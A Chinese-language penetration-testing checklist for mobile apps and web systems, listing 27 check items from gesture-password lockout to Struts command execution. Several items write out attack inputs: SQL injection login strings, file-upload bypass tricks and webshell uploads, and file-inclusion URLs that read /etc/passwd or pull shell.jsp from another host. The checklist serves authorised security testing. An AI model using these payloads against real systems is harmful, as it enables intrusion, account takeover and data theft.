(一)
檢查項:XcodeGhost病毒
優先級:高
檢查要點:下載非官方開發工具,導致IOS版本APP被植入惡意代碼
檢查方法:1、被測應用的開發者使用非蘋果公司官方渠道下載的Xcode工具開發IOS應用程序時,會向所開發的正常APP中植入惡意代碼。被植入惡意程序的APP可以在App Store正常下載並安裝使用。該惡意代碼竊取應用名、應用版本號、系統版本號、語言、國家名、開發者符號、app安裝時間、設備名稱、設備類型等信息,造成用戶數據泄露。
(二)
檢查項:密碼鎖定策略
優先級:高
檢查要點:測試客戶端是否存在手勢密碼多次輸入錯誤被鎖定的安全策略。
檢查方法:
1、首先通過正常的操作流程設置一個手勢密碼。
2、輸入不同於步驟1中的手勢密碼,觀察客戶端的登陸狀態及相應提示。若連續輸入多次手勢密碼錯誤,觀察當用戶處於登陸狀態時是否退出當前的登陸狀態並關閉客戶端;當客戶未處於登錄狀態時是否關閉客戶端並進行一定時間的輸入鎖定。
(三)
檢查項:密碼復雜度
優先級:高
檢查要點:試客戶端手勢密碼復雜度,觀察是否有點位數量判斷邏輯。
檢查方法:
1、進入客戶端設置手勢密碼的頁面進行手勢密碼設置。
2、進行手勢密碼設置,觀察客戶端手勢密碼設置邏輯是否存在最少點位的判斷。
(四)
檢查項:登錄窗口注入漏洞
優先級:高
檢查要點:檢查APP登錄窗口是否存在注入漏洞
檢查方法:
1、首先通過抓包判斷站點前端開發語言,如:jsp、php和asp等;
2、根據不同的開發語言輸入不同的萬能密碼進行嘗試,如:jsp語言(admin' or 1=1/*等)、PHP語言('or 1=1/*等)和asp/aspx語言(""or ""a""=""a等);
3、判斷是否可以成功登錄
(五)
檢查項:傳輸通道加密傳輸
優先級:高
檢查要點:驗證傳輸通道是否加密
檢查方法:
1)采用抓包工具,如:BurpSuite等對登陸過程進行抓包
2)驗證是否對傳輸通道進行加密,如:https。
(六)
檢查項:賬號枚舉暴力破解
優先級:高
檢查要點:是否具備對賬號枚舉的防范措施
檢查方法:
1)采用抓包工具,如:burpsuite等對登陸過程進行抓包;
2)對用戶名字段,如:手機號,進行枚舉攻擊;
3)判斷服務器對該攻擊過程是否具備防范措施,如:IP封鎖等。
(七)
檢查項:密碼暴力破解(或動態短信暴力破解)
優先級:高
檢查要點:是否具備對賬號暴力破解的防范措施
檢查方法:
1)首先檢查登陸機制中,是否存在圖形驗證碼或動態短信,如果沒有,則進行一下操作;
2)采用抓包工具,如:burpsuite等對登陸過程進行抓包;
2)對用戶密碼進行暴力破解攻擊;
3)判斷服務器對該攻擊過程是否具備防范措施,如,賬戶鎖定、IP封鎖等
(八)
檢查項:圖形驗證碼繞過
優先級:高
檢查要點:是否能夠繞過圖形驗證碼
檢查方法:
1)采用抓包工具,如burpsuite等對登陸過程進行抓包;
2)多次使用同一驗證碼訪問,驗證驗證碼是否使用一次后失效;
3)分析驗證碼驗證請求和登陸認證請求是否在同一個請求中,如果不在一個請求中,驗證單獨發送登陸認證或者一次驗證碼驗證后多次登陸認證是否能登陸成功
(九)
檢查項:短信炸彈
優先級:高
檢查要點:是否存在短信炸彈
檢查方法:1)使用BurpSuite抓包獲取發送短信報文並發送到Repeater模塊進行重放報文,模擬向用戶發送多次短信的操作;
(十)
檢查項:密碼重置繞過
優先級:高
檢查要點:密碼重置過程中的驗證功能是否能夠繞過
檢查方法:
1)采用抓包工具,如如:burpsuite等抓取密碼重置過程包
2)檢查重置密碼的請求是否包括驗證信息,如果不包括驗證信息,修改重置賬號為其他用戶的賬號,重放重置密碼請求,驗證是否重置成功;如果包括驗證信息,驗證是否有失效或者防偽造機制。
(十一)
檢查項:密碼復雜度
優先級:高
檢查要點:測試修改密碼時,是否有復雜度校驗
檢查方法:1、人工測試,嘗試將密碼修改為弱口令,如:123456,654321,121212,888888等,查看客戶端是否拒絕弱口令。
(十二)
檢查項:惡意注冊
優先級:高
檢查要點:是否有惡意注冊防范功能
檢查方法:
1)注冊過程是否有圖形驗證碼、短信驗證碼防批量注冊措施
2)再判斷圖形驗證碼或動態短信是否存在繞過漏洞
(十三)
檢查項:業務邏輯繞過
優先級:高
檢查要點:對於可以通過代理的方式對交互數據進行分析的客戶端,可以對涉及到敏感信息操作的具體業務功能進行測試
檢查方法:
1、根據客戶端的業務流程,使用代理截獲客戶端每個功能的通信數據,測試對交互數據的篡改或重放所導致的問題。
2、具體測試內容包括但不限於:篡改造成的越權操作,交易篡改,特殊數據提交(如各種注入問題),重放導致的多次交易等等。
(十四)
檢查項:SQL注入、cookie注入、xss常見的應用漏洞
優先級:高
檢查要點:檢查各web應用系統是否存在web常見漏洞,如:sql注入、cookie注入等
檢查方法:
1、尋找可疑點:
使用AWVS掃描器對目標網站進行掃描以找出所有的SQL注入、cookie注入、xss可疑點;
2、確認可疑點是否存在注入、跨站等;
利用WVS的提示進行手動驗證或sqlmap、pangolin等進行驗證
(十五)
檢查項:文件上傳
優先級:高
檢查要點:是否存在可以上傳任意類型的文件,從而獲取webshell
檢查方法:
1、手工找到上傳點,例如圖片上傳、附件上傳
2、采用直接上傳木馬(webshell或者腳本文件),例如shell.jsp
3、采用上傳后綴為jpg的木馬文件,使用burp抓包,並將后綴改為jsp嘗試繞過客戶端驗證
4、采用00截斷方法,嘗試進行上傳;
5、采用繞過服務端MIME類型檢測,嘗試進行上傳。通過burp修改content-type,例如將其內容application/x-httpd-php或text/plain改為image/gif
6、采用上傳一個在真實圖片中插入一句話木馬的圖片,繞過對文件內容檢測;
(例:
文件名大小寫繞過:例如AsP、pHp、JSp等;
黑名單繞過:例如asa、cer等;
FCKEditor上傳php2、php4、inc、pwml、asa、cer等格式;
截斷繞過:1.php[\0].jpg,test.asp%00.jpg截斷繞過
解析漏洞
II6:上傳1.asp;1.jpg格式的文件;test.asp/test
Nginx下的PHP CGI解析漏洞,上傳1.jpg文件,然后訪問http://website.com/1.jpg/1.php,1.jpg文件可能會以php文件執行;test.jpg%00.php
Apache上傳繞過:phpshell.php.rar.rar.rar.rar)
(十六)
檢查項:任意文件下載
優先級:高
檢查要點:無需登錄可以任意下載文件
檢查方法:
1、嘗試尋找文件下載點
2、 在不登陸情況下,嘗試去下載某些文件(例如db、doc、txt等格式的文件)
(十七)
檢查項:本地文件包含
優先級:高
檢查要點:是否可以包含本地任意文件
檢查方法:
1)通過AWVS掃描,查看掃描結果中,是否存在local file include漏洞
2)更改參數的值為其他路徑和文件進行驗證,在瀏覽器地址欄中嘗試以下URL:
對於UNIX/Linux服務器可以嘗試包含/etc/passwd:
http://www.exmaple.com/viewfile.do?filename=../etc/passwd
對於Windows服務器可以嘗試包含
http://www.exmaple.com/viewfile.do?filename=c:\boot.ini文件
3)嘗試使用截斷,來繞過對文件類型的檢查,例如:
http://www.exmaple.com/viewfile.do?filename=../../../../../etc/passwd%00
(十八)
檢查項:遠程文件包含
優先級:高
檢查要點:是否可以遠程包含文件
檢查方法:
1)通過AWVS掃描,查看掃描結果中,是否存在file include漏洞
2)更改參數的值為本機的一個web服務根目錄下的一個文件,例如shell.jsp
http://www.exmaple.com/viewfile.do?filename=http://192.168.110.160/shell.jsp
3)嘗試使用截斷,來繞過對文件類型的檢查,例如:
http://www.exmaple.com/viewfile.do?filename=http://192.168.110.160/etc/passwd%00
(十九)
檢查項:未授權訪問
優先級:高
檢查要點:是否存在垂直權限提升
檢查方法:
1、利用“敏感數據掃描工具”在不登陸情況下訪問省公司提供的CRM系統的功能URL清單。
2、查看掃描工具檢測結果中可被未授權訪問的URL;
3、對未授權訪問的URL進行手工驗證
(二十)
檢查項:越權訪問
優先級:高
檢查要點:
1)是否使用低權限可以訪問高權限賬號的URL
2)是否存在同級越權
檢查方法:
1、低權限賬號可以訪問高權限賬號
1)使用高權限賬號登陸,抓取一些只有高權限賬號才能登陸的URL
2)退出高權限賬號,使用低權限賬號登陸后,嘗試訪問這些高權限賬號才能訪問的URL
2、同級別越權
使用A賬號能否訪問B賬號的特定數據,實現越權訪問
(二十一)
檢查項:短信接口惡意調用
優先級:高
檢查要點:是否存在短信接口惡意調用
檢查方法:
1)在調用短信接口過程中,使用burp進行抓包,修改發送目標與內容
2)查看是否能按照預定發送短信
(二十二)
檢查項:目錄遍歷
優先級:中
檢查要點:是否存在目錄遍歷
檢查方法:
1)通過AWVS掃描,查看掃描結果中,是否存在Directory Listing漏洞
2)使用目錄掃描工具掃描目標
3)利用瀏覽器打開漏洞鏈接,驗證前面兩種掃描結果,是否可以成功瀏覽目錄
(二十三)
檢查項:session失效
優先級:中
檢查要點:是否在關閉瀏覽器、注銷、超時的情況下session失效
檢查方法:
1)在正常業務操作中,通過burp抓取session id
2)關閉瀏覽器、注銷、超時后分別執行第三步
3)使用第一步抓取的session id訪問(利用edit cookie訪問某需要登錄后才能訪問URL)
(二十四)
檢查項:session繞過
優先級:中
檢查要點:是否存在session繞過
檢查方法:
1)使用burp截取一個正常業務操作的包,並刪除session id后提交請求,查看是否可以成功訪問
(二十五)
檢查項:會話無session校驗
優先級:中
檢查要點:是否存在會話無session校驗
檢查方法:
1)在正常業務操作中,對數據訪問進行抓包,查看數據包中是否存在session等字段,如果沒有,則進行如下操作。
2)在異地直接打開該URL
(二十六)
檢查項:錯誤處理測試
優先級:中
檢查要點:應用程序報錯中泄漏敏感信息
檢查方法:檢查報錯是否含有系統信息、錯誤代碼、版本號等信息
(二十七)
檢查項:struts任意命令執行漏洞
優先級:高
檢查要點:是否存在struts任意命令執行漏洞
檢查方法:
1、查看各檢查系統是否使用Struts2框架
2、使用K8_Struts2_EXP工具進行檢查、驗證,查看工具是否成功執行系統命令